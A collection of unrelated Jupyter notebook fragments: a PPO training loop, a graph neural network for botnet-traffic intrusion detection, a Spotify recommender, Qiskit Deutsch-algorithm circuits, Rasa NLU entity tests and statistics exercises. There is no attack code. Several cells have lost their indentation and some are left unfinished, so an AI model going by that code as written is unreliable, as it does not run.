n_latent_var = 16 #8 #64 # number of variables in hidden layer
# https://stats.stackexchange.com/a/354476 :
# classic statistical advice to use the number of samples at least 10 times more than the number of parameters. This is vague, of course. If the problem is too noisy, you can demand 100 times more, or 1000 times more.
# we have a max of 100 cases (actions) or in worst case 20 cases (episode)
    update_timestep = 5 #4000# update policy every n timesteps; should match max_timesteps
    action_std = 0.6 # 0.4 #0.6 # constant std for action distribution # not sure what to set here; should run a hyperparameter optimization on it
    # my action space is 2 times smaller than the original problem, so I divided by sqrt(2)
lr = 0.0025 # learning rate : https://www.freecodecamp.org/news/how-to-pick-the-best-learning-rate-for-your-machine-learning-project-9c28865039a8/
# i will have to run a hyperparm opt on it even if it's the best value
    betas = (0.9, 0.999) # should I hyper-optimize this or not? ++beta
gamma = 0.99 # discount factor # hyperOpt ++
K_epochs = 5 #5 # update policy for K epochs
eps_clip = 0.2 # clip parameter for PPO
random_seed = None
#############################################
# creating environment
env = KddEnv()
if random_seed:
print("Random Seed: {}".format(random_seed))
torch.manual_seed(random_seed)
env.seed(random_seed)
np.random.seed(random_seed)
memory = Memory()
ppo = PPO(env.state_dim, env.action_dim, n_latent_var, action_std, lr, betas, gamma, K_epochs, eps_clip) # this beta have nothing todo with what i'm trying to add
# logging variables
running_reward = 0
old_running_reward = 0
avg_length = 0
time_step = 0
# training loop
for i_episode in range(1, max_episodes+1):
state = env.reset()
for t in range(max_timesteps):
time_step +=1
print("time_step ",time_step )
# Running policy_old:
action = ppo.select_action(state, memory)
state, reward, done, _ = env.step(action)
# Saving reward:
memory.rewards.append(reward)
# update if its time
if time_step % update_timestep == 0:
ppo.update(memory)
memory.clear_memory()
time_step = 0
running_reward += reward
if render:
env.render()
if done:
print("running_reward (tot) when done: ",running_reward - old_running_reward)
old_running_reward = running_reward
break
avg_length += t
# # stop training if avg_reward > solved_reward
if running_reward > (log_interval*solved_reward):
print("########## Solved! ##########")
torch.save(ppo.policy.state_dict(), './PPO_Continuous_{}.pth'.format(env_name))
break
# logging
if i_episode % log_interval == 0:
avg_length = int(avg_length/log_interval)
running_reward = int((running_reward/log_interval))
print('Episode {} \t Avg length: {} \t Avg reward: {}'.format(i_episode, avg_length, running_reward))
running_reward = 0
avg_length = 0
if __name__ == '__main__':
main()
```
| github_jupyter |
```
import dgl.nn as dglnn
from dgl import from_networkx
import torch.nn as nn
import torch as th
import torch.nn.functional as F
import dgl.function as fn
from dgl.data.utils import load_graphs
import networkx as nx
import pandas as pd
import socket
import struct
import random
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
data = pd.read_csv('./bot.csv')
data.drop(columns=['subcategory','pkSeqID','stime','flgs','attack','state','proto','seq'],inplace=True)
data.rename(columns={"category": "label"},inplace = True)
data.label.value_counts()
le = LabelEncoder()
le.fit_transform(data.label.values)
data['label'] = le.transform(data['label'])
data['saddr'] = data.saddr.apply(str)
data['sport'] = data.sport.apply(str)
data['daddr'] = data.daddr.apply(str)
data['dport'] = data.dport.apply(str)
data['saddr'] = data.saddr.apply(lambda x: socket.inet_ntoa(struct.pack('>I', random.randint(0xac100001, 0xac1f0001))))
data['saddr'] = data['saddr'] + ':' + data['sport']
data['daddr'] = data['daddr'] + ':' + data['dport']
data.drop(columns=['sport','dport'],inplace=True)
label_ground_truth = data[["saddr", "daddr","label"]]
data = pd.get_dummies(data, columns = ['flgs_number','state_number', 'proto_number'])
data = data.reset_index()
data.replace([np.inf, -np.inf], np.nan,inplace = True)
data.fillna(0,inplace = True)
label_ground_truth = data[["saddr", "daddr","label"]]
data.drop(columns=['index'],inplace=True)
data
scaler = StandardScaler()
cols_to_norm = list(set(list(data.iloc[:, 2:].columns )) - set(list(['label'])) )
data[cols_to_norm] = scaler.fit_transform(data[cols_to_norm])
X_train, X_test, y_train, y_test = train_test_split(
data, label_ground_truth, test_size=0.3, random_state=42, stratify=label_ground_truth.label)
X_train['h'] = X_train[ cols_to_norm ].values.tolist()
#from dgl.data.utils import load_graphs
#G = load_graphs("./data.bin")[0][0]
G = nx.from_pandas_edgelist(X_train, "saddr", "daddr", ['h','label'], create_using= nx.MultiGraph())
G = G.to_directed()
G = from_networkx(G,edge_attrs=['h','label'])
#from dgl.data.utils import save_graphs
#save_graphs("./data.bin", [G])
G.ndata['h'] = th.ones(G.num_nodes(), G.edata['h'].shape[1])
G.edata['train_mask'] = th.ones(len(G.edata['h']), dtype= th.bool)
#G = load_graphs("./bot_train_G.bin") [0][0]
# Eq1
G.ndata['h'] = th.ones(G.num_nodes(), G.edata['h'].shape[1])
G.edata['train_mask'] = th.ones(len(G.edata['h']), dtype=th.bool)
G.ndata['h'] = th.reshape(G.ndata['h'], (G.ndata['h'].shape[0], 1, G.ndata['h'].shape[1]))
G.edata['h'] = th.reshape(G.edata['h'], (G.edata['h'].shape[0], 1, G.edata['h'].shape[1]))
class MLPPredictor(nn.Module):
def __init__(self, in_features, out_classes):
super().__init__()
self.W = nn.Linear(in_features * 2, out_classes)
def apply_edges(self, edges):
h_u = edges.src['h']
h_v = edges.dst['h']
score = self.W(th.cat([h_u, h_v], 1))
return {'score': score}
def forward(self, graph, h):
with graph.local_scope():
graph.ndata['h'] = h
graph.apply_edges(self.apply_edges)
return graph.edata['score']
G.ndata['h'].shape
def compute_accuracy(pred, labels):
return (pred.argmax(1) == labels).float().mean().item()
class SAGELayer(nn.Module):
def __init__(self, ndim_in, edims, ndim_out, activation):
super(SAGELayer, self).__init__()
### force to outut fix dimensions
self.W_msg = nn.Linear(ndim_in + edims, ndim_out)
### apply weight
self.W_apply = nn.Linear(ndim_in + ndim_out, ndim_out)
self.activation = activation
def message_func(self, edges):
return {'m': self.W_msg(th.cat([edges.src['h'], edges.data['h']], 2))}
def forward(self, g_dgl, nfeats, efeats):
with g_dgl.local_scope():
g = g_dgl
g.ndata['h'] = nfeats
g.edata['h'] = efeats
# Eq4
g.update_all(self.message_func, fn.mean('m', 'h_neigh'))
# Eq5
g.ndata['h'] = F.relu(self.W_apply(th.cat([g.ndata['h'], g.ndata['h_neigh']], 2)))
return g.ndata['h']
class SAGE(nn.Module):
def __init__(self, ndim_in, ndim_out, edim, activation, dropout):
super(SAGE, self).__init__()
self.layers = nn.ModuleList()
self.layers.append(SAGELayer(ndim_in, edim, 128, activation))
self.layers.append(SAGELayer(128, edim, ndim_out, activation))
self.dropout = nn.Dropout(p=dropout)
def forward(self, g, nfeats, efeats):
for i, layer in enumerate(self.layers):
if i != 0:
nfeats = self.dropout(nfeats)
nfeats = layer(g, nfeats, efeats)
return nfeats.sum(1)
class Model(nn.Module):
def __init__(self, ndim_in, ndim_out, edim, activation, dropout):
super().__init__()
self.gnn = SAGE(ndim_in, ndim_out, edim, activation, dropout)
self.pred = MLPPredictor(ndim_out, 5)
def forward(self, g, nfeats, efeats):
h = self.gnn(g, nfeats, efeats)
return self.pred(g, h)
from sklearn.utils import class_weight
class_weights = class_weight.compute_class_weight(class_weight='balanced',
                                                  classes=np.unique(G.edata['label'].cpu().numpy()),
                                                  y=G.edata['label'].cpu().numpy())
class_weights = th.FloatTensor(class_weights).cuda()
criterion = nn.CrossEntropyLoss(weight = class_weights)
G = G.to('cuda:0')
G.device
G.ndata['h'].device
G.edata['h'].device
node_features = G.ndata['h']
edge_features = G.edata['h']
edge_label = G.edata['label']
train_mask = G.edata['train_mask']
model = Model(G.ndata['h'].shape[2], 128, G.ndata['h'].shape[2], F.relu, 0.2).cuda()
opt = th.optim.Adam(model.parameters())
for epoch in range(1, 14500):
    pred = model(G, node_features, edge_features).cuda()
    loss = criterion(pred[train_mask], edge_label[train_mask])
    opt.zero_grad()
    loss.backward()
    opt.step()
    if epoch % 100 == 0:
        print('Epoch:', epoch, ' Training acc:', compute_accuracy(pred[train_mask], edge_label[train_mask]))
X_test['h'] = X_test[ cols_to_norm ].values.tolist()
#G_test = load_graphs("bot_test_G.bin") [0][0]
G_test = nx.from_pandas_edgelist(X_test, "saddr", "daddr", ['h','label'],create_using=nx.MultiGraph())
G_test = G_test.to_directed()
G_test = from_networkx(G_test,edge_attrs=['h','label'] )
actual = G_test.edata.pop('label')
G_test.ndata['feature'] = th.ones(G_test.num_nodes(), 55)
G_test.ndata['feature'] = th.reshape(G_test.ndata['feature'], (G_test.ndata['feature'].shape[0], 1, G_test.ndata['feature'].shape[1]))
G_test.edata['h'] = th.reshape(G_test.edata['h'], (G_test.edata['h'].shape[0], 1, G_test.edata['h'].shape[1]))
G_test = G_test.to('cuda:0')
th.cuda.empty_cache()
import timeit
start_time = timeit.default_timer()
node_features_test = G_test.ndata['feature']
edge_features_test = G_test.edata['h']
test_pred = model(G_test, node_features_test, edge_features_test).cuda()
elapsed = timeit.default_timer() - start_time
print(str(elapsed) + ' seconds')
test_pred = test_pred.argmax(1)
test_pred = th.Tensor.cpu(test_pred).detach().numpy()
edge_label = le.inverse_transform(actual)
test_pred = le.inverse_transform(test_pred)
def plot_confusion_matrix(cm,
target_names,
title='Confusion matrix',
cmap=None,
normalize=True):
import matplotlib.pyplot as plt
import numpy as np
import itertools
accuracy = np.trace(cm) / float(np.sum(cm))
misclass = 1 - accuracy
if cmap is None:
cmap = plt.get_cmap('Blues')
plt.figure(figsize=(12, 12))
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
if target_names is not None:
tick_marks = np.arange(len(target_names))
plt.xticks(tick_marks, target_names, rotation=45)
plt.yticks(tick_marks, target_names)
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
thresh = cm.max() / 1.5 if normalize else cm.max() / 2
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
if normalize:
plt.text(j, i, "{:0.4f}".format(cm[i, j]),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
else:
plt.text(j, i, "{:,}".format(cm[i, j]),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label\naccuracy={:0.4f}; misclass={:0.4f}'.format(accuracy, misclass))
plt.show()
from sklearn.metrics import confusion_matrix
plot_confusion_matrix(cm = confusion_matrix(edge_label, test_pred),
normalize = False,
target_names = np.unique(edge_label),
title = "Confusion Matrix")
```
| github_jupyter |
# Imports and Installs
```
# Imports
import pandas as pd
import numpy as np
import pandas_profiling
from sklearn import preprocessing # for category encoder
from sklearn.neighbors import NearestNeighbors
from sklearn.model_selection import train_test_split
# joblib is much more efficient than pickle for persisting large models, such as the Nearest Neighbors model used here
import joblib
# Read in data
df = pd.read_csv('https://raw.githubusercontent.com/aguilargallardo/DS-Unit-2-Applied-Modeling/master/data/SpotifyFeatures.csv')
df = df.dropna() # drop null values
df.shape
```
## Neural Network
#### Preprocessing
```
time_sig_encoding = { '0/4' : 0, '1/4' : 1,
'3/4' : 3, '4/4' : 4,
'5/4' : 5}
key_encoding = { 'A' : 0, 'A#' : 1, 'B' : 2,
'C' : 3, 'C#' : 4, 'D' : 5,
'D#' : 6, 'E' : 7, 'F' : 8,
                 'F#' : 9, 'G' : 10, 'G#' : 11 }
mode_encoding = { 'Major':0, 'Minor':1}
df['key'] = df['key'].map(key_encoding)
df['time_signature'] = df['time_signature'].map(time_sig_encoding)
df['mode'] = df['mode'].map(mode_encoding)
# helper function to one hot encode genre
def encode_and_bind(original_dataframe, feature_to_encode):
dummies = pd.get_dummies(original_dataframe[[feature_to_encode]])
res = pd.concat([original_dataframe, dummies], axis=1)
return(res)
df = encode_and_bind(df, 'genre')
df = df.dropna() # drop the rows that the key/time-signature mapping turned into NaN (unmapped categories)
# check worked out
df.dtypes
```
# MODELING: Nearest Neighbors
resources: https://scikit-learn.org/stable/modules/neighbors.html
```
neigh = NearestNeighbors()
# to remove the transformed columns from model
remove = ['key', 'mode','time_signature']
features = [i for i in list(df.columns[4:]) if i not in remove]
# target = 'track_id'
X = df[features]
# y = df[target]
X.shape, #y.shape
neigh.fit(X) # NearestNeighbors is unsupervised, so it doesn't need y
```
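Once fitted, recommendations come from `kneighbors`. A self-contained toy version of that lookup (synthetic features standing in for the Spotify columns):

```python
import numpy as np
from sklearn.neighbors import NearestNeighbors

# four toy tracks described by two made-up audio features
feats = np.array([[0.10, 0.90],
                  [0.12, 0.88],
                  [0.90, 0.10],
                  [0.85, 0.15]])
model = NearestNeighbors(n_neighbors=2).fit(feats)
dist, idx = model.kneighbors(feats[[0]])
print(idx)  # → [[0 1]] : a track's nearest neighbor is itself, then the closest other track
```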
### Autoencoder
```
from tensorflow.keras.layers import Input, Dense
from tensorflow.keras.models import Model
from sklearn.neighbors import NearestNeighbors

encoding_dim = 32  # compress the audio-feature space down to 32 dimensions

input_layer = Input(shape=(X.shape[1],))
encoded = Dense(encoding_dim, activation='relu')(input_layer)
decoded = Dense(X.shape[1])(encoded)
autoencoder = Model(input_layer, decoded)
autoencoder.compile(optimizer='adam', loss='mse')
autoencoder.fit(X, X, epochs=10, batch_size=256)

# fit nearest neighbors on the compressed representation
encoded_features = Model(input_layer, encoded).predict(X)
nn = NearestNeighbors(n_neighbors=10, algorithm='ball_tree')
nn.fit(encoded_features)
```
#### Nicole's Imported Model
```
# K nearest neighbors NN https://www.reddit.com/r/MachineLearning/comments/2f8jff/using_neural_networks_for_nearest_neighbor/
import numpy as np
# feed-forward neural network (multi-layer perceptron)
np.random.seed(812)
# input data: 7 samples, each with 3 binary features
X = np.array(([0,0,1],
[0,1,1],
[1,0,1],
[0,1,0],
[1,0,0],
[1,1,1],
[0,0,0]), dtype=float)
# Target labels (one binary label per sample)
y = np.array(([0],
              [1],
              [1],
              [1],
              [1],
              [0],
              [0]), dtype=float)
# Feature normalization
# Scaling features helps the network converge faster; here X is already
# binary, so dividing by the column maxima is a no-op, and y is already
# in [0, 1], so no further scaling is needed.
X = X / np.amax(X, axis=0)
print("Inputs \n", X)
print("Targets \n", y)
# neural network class for function (REVIEW THIS CELL)
class NeuralNetwork:
    def __init__(self):
        # Set up the architecture of the neural network
        self.inputs = 3
        self.hiddenNodes = 4
        self.outputNodes = 1
        # Initial weights
        # 3x4 matrix for the first layer: inputs to hidden
        self.weights1 = np.random.rand(self.inputs, self.hiddenNodes)
        # 4x1 matrix for hidden to output
        self.weights2 = np.random.rand(self.hiddenNodes, self.outputNodes)
```
# Export Model with Joblib
```
import joblib

filename = 'NearestNeighbor.sav'
joblib.dump(neigh, filename)
```
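The saved file can be restored with `joblib.load` and queried immediately. A hedged round-trip sketch on a tiny synthetic fit (filename reused from above; data illustrative):

```python
import joblib
import numpy as np
from sklearn.neighbors import NearestNeighbors

model = NearestNeighbors(n_neighbors=2).fit(np.array([[0.0], [1.0], [10.0]]))
joblib.dump(model, 'NearestNeighbor.sav')

restored = joblib.load('NearestNeighbor.sav')
dist, idx = restored.kneighbors([[0.2]])   # nearest points to x = 0.2
```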
<img src="classical_gates.png" />
```
%matplotlib inline
# Importing standard Qiskit libraries
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister, execute, BasicAer
from qiskit.tools.jupyter import *
from qiskit.visualization import *
qr = QuantumRegister(2, 'qubit')
cr = ClassicalRegister(2, name="bit")
circuit = QuantumCircuit(qr, cr)
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.measure(qr, cr)
circuit.draw('mpl', initial_state=True)
# Load simulator
local_simulator = BasicAer.get_backend('qasm_simulator')
job = execute(circuit, backend=local_simulator, shots=1000)
print(job.result().get_counts())
plot_histogram(job.result().get_counts())
```
# Deutsch Algorithm
<table>
<tbody>
<tr>
<td colspan="2"><img src="deutsch_problem.png" /></td>
</tr>
<tr>
<td><img src="classic_oracle.png" /></td>
<td><img src="quantum_oracle.png" /></td>
</tr>
</tbody>
</table>
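Before building the oracles in Qiskit, the ideal behavior of Deutsch's algorithm can be cross-checked with plain NumPy linear algebra. This is a hedged sketch: the two-qubit convention (q0, the input, stored as the least-significant bit) and all helper names are my own, not Qiskit's.

```python
import numpy as np

H = np.array([[1, 1], [1, -1]]) / np.sqrt(2)
I2 = np.eye(2)
X = np.array([[0, 1], [1, 0]])

def oracle_matrix(f):
    # U_f |x>|y> -> |x>|y XOR f(x)>, with q0 = x as the least-significant bit
    U = np.zeros((4, 4))
    for x in (0, 1):
        for y in (0, 1):
            U[2 * (y ^ f(x)) + x, 2 * y + x] = 1
    return U

def deutsch(f):
    state = np.zeros(4)
    state[0] = 1.0                      # |q1 q0> = |00>
    state = np.kron(X, I2) @ state      # X on q1  -> |10>
    state = np.kron(H, H) @ state       # H on both qubits
    state = oracle_matrix(f) @ state    # one oracle query
    state = np.kron(I2, H) @ state      # H on q0
    p1 = state[1] ** 2 + state[3] ** 2  # P(measuring q0 gives 1)
    return 'BALANCED' if p1 > 0.5 else 'CONSTANT'

for name, f in [('constant0', lambda x: 0), ('constant1', lambda x: 1),
                ('identity', lambda x: x), ('invert', lambda x: 1 - x)]:
    print(name, '->', deutsch(f))
```

A single oracle query suffices: the two constant functions always yield q0 = 0, the two balanced ones always yield q0 = 1.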
## Oracle 4: Constant zero
```
input = QuantumRegister(1, name='input')
output = QuantumRegister(1, name='output')
constant0 = QuantumCircuit(input, output, name='oracle')
oracle4 = constant0.to_instruction()
constant0.draw('mpl', initial_state=True)
```
## Oracle 3: Constant one
```
input = QuantumRegister(1, name='input')
temp = QuantumRegister(1, name='output')
constant1 = QuantumCircuit(input, temp, name='oracle')
constant1.x(temp)
oracle3 = constant1.to_instruction()
constant1.draw('mpl', initial_state=True)
```
## Oracle 1: Identity
```
input = QuantumRegister(1, name='input')
temp = QuantumRegister(1, name='output')
identity = QuantumCircuit(input, temp, name='oracle')
identity.cx(input, temp)
oracle1 = identity.to_instruction()
identity.draw('mpl', initial_state=True)
```
## Oracle 2: Invert
```
input = QuantumRegister(1, name='input')
output = QuantumRegister(1, name='output')
invert = QuantumCircuit(input, output, name='oracle')
invert.cx(input, output)
invert.x(output)
oracle2 = invert.to_instruction()
invert.draw('mpl', initial_state=True)
# footnote on alternative ways to write classical functions as quantum circuits
from qiskit.circuit import classical_function
from qiskit.circuit import Int1
@classical_function
def alt_invert(input: Int1) -> Int1:
    return not input
invert_gate = alt_invert.synth(registerless=False)
display(invert_gate.draw('mpl', initial_state=True))
invert_gate.decompose().draw('mpl', initial_state=True)
```
## Run an oracle
```
result = ClassicalRegister(1, name='result')
circuit = QuantumCircuit(input, output, result)
circuit.x(input) # <- set input to 1
circuit.barrier()
circuit += invert # options: identity, invert, constant1, constant0
circuit.barrier()
circuit.measure(output, result)
circuit.draw('mpl', initial_state=True)
job = execute(circuit, backend=local_simulator, shots=1000)
print(job.result().get_counts())
```
## Running Deutsch's Algorithm
```
qr = QuantumRegister(2, name='qubits')
cr = ClassicalRegister(1, name='result')
circuit = QuantumCircuit(qr, cr)
circuit.x(qr[1])
circuit.h(qr)
circuit.append(oracle2, [qr[0], qr[1]]) # <--- oracle!
circuit.h(qr[0])
circuit.measure(qr[0], cr[0]);
circuit.draw('mpl', initial_state=True, justify='right')
counts = execute(circuit, backend=local_simulator, shots=1).result().get_counts()
# relabel the single measured outcome: '1' means BALANCED, '0' means CONSTANT
counts = {('BALANCED' if k == '1' else 'CONSTANT'): v for k, v in counts.items()}
print(counts)
```
# Real device!
```
import qiskit.tools.jupyter
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
provider = IBMQ.load_account()
least_busy_device = least_busy(provider.backends(simulator=False, filters=lambda b: b.configuration().n_qubits >= 2))
least_busy_device
job = execute(circuit, backend=least_busy_device, shots=1000)
print(job.status())
job.wait_for_final_state()
print(job.status())
counts = job.result().get_counts()
print(counts)
# on real hardware both outcomes appear due to noise; tally shots under the two labels
counts = {'BALANCED': counts.get('1', 0), 'CONSTANT': counts.get('0', 0)}
print(counts)
```
```
import logging
import os
import pytest
from rasa_nlu import data_router, config
from rasa_nlu.components import ComponentBuilder
from rasa_nlu.model import Trainer
from rasa_nlu.utils import zip_folder
from rasa_nlu import training_data
from sagas.provider.hanlp_utils import Hanlp
# logging.basicConfig(level="DEBUG")
logging.basicConfig(level="INFO")
CONFIG_DEFAULTS_PATH = "sample_configs/config_defaults.yml"
DEFAULT_DATA_PATH = "data/examples/rasa/demo-rasa.json"
TEST_MODEL_PATH = "test_models/test_model_spacy_sklearn"
def component_builder():
    return ComponentBuilder()

def hanlp(component_builder, default_config):
    return component_builder.create_component("sagas.provider.hanlp_utils.Hanlp", default_config)

def timenlp(component_builder, default_config):
    return component_builder.create_component("sagas.provider.time_extractor.TimeExtractor", default_config)

def default_config():
    return config.load(CONFIG_DEFAULTS_PATH)
# component_classes = [Hanlp]
# registered_components = {c.name: c for c in component_classes}
hanlp=hanlp(component_builder(), default_config())
timenlp=timenlp(component_builder(), default_config())
import sagas.provider.hanlp_entity_extractor
import importlib  # `imp` is deprecated; importlib.reload is the modern equivalent
importlib.reload(sagas.provider.hanlp_entity_extractor)
from rasa_nlu.config import RasaNLUModelConfig
from rasa_nlu.extractors.spacy_entity_extractor import SpacyEntityExtractor
from rasa_nlu.training_data import TrainingData, Message
from sagas.provider.hanlp_entity_extractor import HanlpEntityExtractor
def test_hanlp_ner_extractor(text, hanlp, hanlp_doc):
    ext = HanlpEntityExtractor()
    example = Message(text, {
        "intent": "wish",
        "entities": [],
        "hanlp_doc": hanlp_doc})
    ext.process(example, hanlp=hanlp.nlp)
    print("total entities", len(example.get("entities", [])))
    for ent in example.get("entities"):
        print(ent)
text="我的希望是希望张晚霞的背影被晚霞映红"
test_hanlp_ner_extractor(text, hanlp, hanlp.doc_for_text(text))
text="蓝翔给宁夏固原市彭阳县红河镇黑牛沟村捐赠了挖掘机"
test_hanlp_ner_extractor(text, hanlp, hanlp.doc_for_text(text))
from sagas.provider.amount_extractor import AmountExtractor
def test_amount_ner_extractor(text, hanlp, hanlp_doc):
    ext = AmountExtractor()
    example = Message(text, {
        "intent": "wish",
        "entities": [],
        "hanlp_doc": hanlp_doc})
    ext.process(example, hanlp=hanlp.nlp)
    print("total entities", len(example.get("entities", [])))
    for ent in example.get("entities"):
        print(ent)
text="十九元套餐包括什么"
test_amount_ner_extractor(text, hanlp, hanlp.doc_for_text(text))
text="牛奶三〇〇克*2"
test_amount_ner_extractor(text, hanlp, hanlp.doc_for_text(text))
from sagas.provider.hanlp_tokenizer import HanlpTokenizer
def test_hanlp_tokenizer(text, hanlp, hanlp_doc):
    ext = HanlpTokenizer()
    example = Message(text, {
        "intent": "wish",
        "entities": [],
        "hanlp_doc": hanlp_doc})
    ext.process(example, hanlp=hanlp)
    for token in example.get("tokens"):
        print(token.text, token.offset)
# text="我的希望是希望张晚霞的背影被晚霞映红"
text="我想去吃兰州拉面"
test_hanlp_tokenizer(text, hanlp, hanlp.doc_for_text(text))
import sagas.provider.time_extractor
import importlib
importlib.reload(sagas.provider.time_extractor)
from rasa_nlu.config import RasaNLUModelConfig
from rasa_nlu.training_data import TrainingData, Message
CONFIG_ZH_PATH = "sample_configs/config_zh.yml"
def test_time_entity_extractor(component_builder):
    # _config = RasaNLUModelConfig({"pipeline": [{"name": "sagas.provider.time_extractor.TimeExtractor"}]})
    # _config.set_component_attr("ner_time", dimensions=["time"], host="unknown")
    _config = config.load(CONFIG_ZH_PATH)
    c = component_builder.create_component("sagas.provider.time_extractor.TimeExtractor", _config)
    message = Message("周五下午7点到8点")
    c.process(message)
    entities = message.get("entities")
    print("total entities", len(entities))
    # Test with a defined date
    # 1381536182000 == 2013/10/12 02:03:02
    message = Message("本周日到下周日出差", time="1381536182000")
    c.process(message)
    entities = message.get("entities")
    print("total entities", len(entities))
    for ent in entities:
        print(ent)
test_time_entity_extractor(component_builder())
```
```
# load your software stack
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
%matplotlib inline
# read the data in, describe it, and plot a histogram of the data
# the data are integers
mypop=pd.read_csv('mypopulation.dat',names=['data'])
print (mypop.describe())
plt.hist(mypop.data, bins=100, density=False);  # density= replaces the removed normed= argument
```
### This data comes from the so-called "uniform distribution"
1) What is the probability of drawing the number 5000?
2) How much of the range is covered by the standard deviation?
3) The uniform distribution has a standard deviation of $\sigma = \sqrt{\frac{(MAX-MIN)^2}{12}}$; how close is our data to this value?
4) Show that, expressed as a fraction of the range, the analytical answer to question 3 is $\frac{1}{\sqrt{12}}$.
```
# probability of drawing any single value from a discrete uniform distribution
print(1.0 / (mypop.data.max() - mypop.data.min()))
print("")
# standard deviation as a fraction of the range
print(mypop.data.std() / (mypop.data.max() - mypop.data.min()))
print("")
# analytical standard deviation of a uniform distribution on [MIN, MAX]
print(np.sqrt(np.power(mypop.data.max() - mypop.data.min(), 2) / 12))
print(mypop.data.std())
print("")
print(1 / np.sqrt(12))
```
### A "real world" scenario
* You are conducting experiments that measure data. The data are a _sample_ that come from the _population_ represented in the array `mypop.data`
* Your goal is to estimate properties of the _population_ by taking _samples_ , you will start by estimating the population mean
* You can control the sample `size`, i.e., how many points you collect in a given experiment
* You can also control the number of experiments `samples`, i.e., how many experiments you conduct
### To do:
* Change the size and # samples and study the output and look for any trends.
* Before you go crazy, I suggest being systematic, changing 1 variable at a time
* I also suggest you don't exceed 1,000,000 as the product of `size x samples`
* Be exploratory - look for trends and try and understand what is happening
* If you want to see multiple `trials` just hit shift-enter and re-execute the same cell
### Before you run the next cell, please take a moment to make a prediction about what will happen!
#### Big picture: you are randomly sampling a set of 10,000,000 uniform random integers. What do you expect the distribution of sample means to look like?
#### My prediction is: << fill here >>
```
#you can control these
#how many data points you collect in each experiment
size=1
# how many experiments will you run
samples=2
#analysis of your data - you can ignore for now but what is happening is commented below
# initialize a vector of zeros, one slot per sample (experiment)
means = np.zeros(samples)
# iterate over the vector in a writeable way (np.nditer with op_flags);
# this is not standard numpy style, but convenient for our purpose:
# one iteration per experiment
for x in np.nditer(means, op_flags=['readwrite']):
    # take your data: randomly sample `size` points from the global population
    data2 = np.random.choice(mypop.data, size=size)
    # record the sample mean for this (the ith) experiment
    x[...] = np.mean(data2)
# plot the histogram of your experiments
plt.hist(means, range=[mypop.data.min(), mypop.data.max()], bins=100)
# print the absolute difference between the population mean (mu) and the average of your experimental data (xbar)
print(np.abs(mypop.data.mean() - means.mean()))
# print the relative difference (mu - xbar) / mu
print(np.abs(mypop.data.mean() - means.mean()) / mypop.data.mean())
```
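One trend worth looking for in the experiments above: by the central limit theorem, the spread of the sample means (the standard error) shrinks like $\sigma/\sqrt{\texttt{size}}$. A hedged NumPy-only check on a stand-in uniform population (all sizes illustrative):

```python
import numpy as np

rng = np.random.default_rng(0)
pop = rng.integers(0, 10_000, size=1_000_000)   # stand-in uniform population

def std_of_sample_means(size, samples=2_000):
    # run `samples` experiments of `size` draws each; return the spread of their means
    means = rng.choice(pop, size=(samples, size)).mean(axis=1)
    return means.std()

se_small = std_of_sample_means(4)
se_large = std_of_sample_means(64)   # 16x the sample size -> roughly 4x smaller spread
print(se_small, se_large, se_small / se_large)
```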
```
import theano.tensor as tt
import pysal as ps
import matplotlib.pyplot as plt
import seaborn as sns  # seaborn.apionly was removed in seaborn 0.9
import numpy as np
import pandas as pd
import ops
import distributions as spdist
import scipy.sparse as spar
import scipy.sparse.linalg as spla
import pymc3 as mc
%matplotlib inline
```
This notebook compares timings for log determinants of the form:
$$ log(|A|) = log(|I - \rho W|) $$
where $W$ is a row-standardized spatial linkage matrix of dimension $N \times N$ and $I$ is an identity matrix. These kinds of determinants are common in spatial models, where they are required for the covariance of a multivariate normal distribution.
For this example, I'll use the counties in Texas, Oklahoma, Arkansas, and Louisiana for an example.
```
df = ps.pdio.read_files(ps.examples.get_path('south.shp'))
df = df.query('STATE_NAME in ("Texas", "Oklahoma", "Arkansas", "Louisiana")')
W = ps.weights.Queen.from_dataframe(df)
W.transform = 'r'
print('There are {} observations in the problem frame'.format(W.n))
```
One method, implemented recently in PyMC3, uses singular value decomposition to compute the log determinant of the positive semidefinite covariance matrices common in multivariate normal distributions. In general, since the covariance matrix is positive semidefinite, we know its determinant is nonnegative.
Since the product of singular values is equivalent to the magnitude of the determinant, the product of singular values for a positive semidefinite matrix is *exactly equal* to its determinant. Thus, with singular values $s_i$,
$$ \prod_i s_i = |I - \rho W| \rightarrow \sum_i \log(s_i) = \log(|I - \rho W|) $$
This is great, since it means we can reuse the efficient SVD routines already implemented in theano for the log determinant computations. The SVD of an $m \times n$ matrix has complexity $O(\min(n^2m, m^2n))$, depending on which of $m$ and $n$ is larger, so for our square $N \times N$ matrix the log determinant costs $O(N^3)$.
While this is a good strategy, this results in the evaluation of an SVD of $A$ each time a determinant is required. In a Markov Chain Monte Carlo strategy, this means an SVD is required each iteration. Often, the number of iterations for an MCMC sampler exceeds the number of observations significantly.
Thus, what we're really looking for is fast determinants of a matrix with known *repeated* structure. If there were some way to pre-factor $A$ over a range of $\rho$, the cost of the matrix factorization would be amortized over the $t$ iterations of the sampler. One common approximation strategy is to do this prefactoring by evaluating $A$ at many $\rho$, then storing the resulting log determinants and linearly interpolating or inverse sampling between these values.
Another prefactoring strategy uses the eigenvalues of $W$. This is due to a proof by spatial statistician Keith Ord in 1975, and lets us compute $|A|$ as a linear-time function of the eigenvalues of $W$ and $\rho$:
$$ \log|A| = \sum_i^n \log(1 - \rho e_i)$$
Thus, if $e_i$ is available, then this is attainable.
Additionally, $A$ is a sparse matrix, since $W$ is very sparse. For example, for an adjacency matrix for counties in TX, LA, AR, and OK, just shy of 1% of entries in the matrix are nonzero:
```
W.nonzero / W.n**2
```
Thus, a dedicated sparse matrix algorithm to compute the log determinant may provide speedups. Sparse matrix algorithms exploit the fact that so many elements of the matrix are zero and can often provide quantities of interest faster than a dense matrix algorithm.
